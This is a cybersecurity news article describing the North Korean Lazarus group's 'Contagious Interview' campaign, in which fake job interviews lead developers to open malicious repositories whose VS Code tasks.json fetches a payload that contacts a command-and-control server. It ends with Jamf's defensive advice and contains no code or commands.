URGENT UPDATE: North Korean hackers have launched a sophisticated attack targeting Microsoft Visual Studio Code, raising alarm for developers worldwide. The notorious Lazarus group is behind this latest breach, which uses a campaign known as “Contagious Interview” to exploit unsuspecting software and blockchain developers in Western nations.
As part of this urgent threat, attackers create fake job opportunities and lure victims into deploying malicious software during the interview process. This method has proven effective, attributed to some of the largest cryptocurrency thefts in recent years. Security researchers from Jamf have confirmed that new techniques in this ongoing campaign could lead to significant security vulnerabilities.
The attack unfolds as follows: hackers establish malicious Git repositories on platforms like GitHub and GitLab. During the interview process, victims are tricked into cloning and opening these repositories in Microsoft Visual Studio Code. Once they trust the repository author, the application inadvertently processes commands from a compromised tasks.json configuration file.
On macOS systems, these commands activate a hidden shell that retrieves a JavaScript payload from external platforms, like Vercel. This payload creates a persistent loop, harvesting data such as hostnames and MAC addresses while establishing communication with a remote command-and-control (C2) server.
“We strongly recommend that customers ensure Threat Prevention and Advanced Threat Controls are enabled and set to block mode in Jamf for Mac to remain protected against the techniques described in this research,” Jamf warns.
This alarming development necessitates immediate action. Jamf advises developers to exercise extreme caution when interacting with untrusted repositories and to thoroughly review contents before marking them as trusted in Visual Studio Code. Failure to do so could result in significant breaches of personal and organizational security.
The Lazarus group’s Contagious Interview campaign represents a serious escalation in cyber threats, highlighting the urgent need for robust security measures. Developers and organizations must prioritize the implementation of advanced threat controls and remain vigilant against potential phishing and malware attempts.
As this situation evolves, it’s crucial for the tech community to stay informed. Jamf’s recommendations emphasize the importance of proactive security measures to mitigate risks associated with these sophisticated hacking techniques.
Follow TechRadar for real-time updates on this developing story and essential cybersecurity news. Click the Follow button to keep informed on the latest threats and protective measures against cyber attacks.
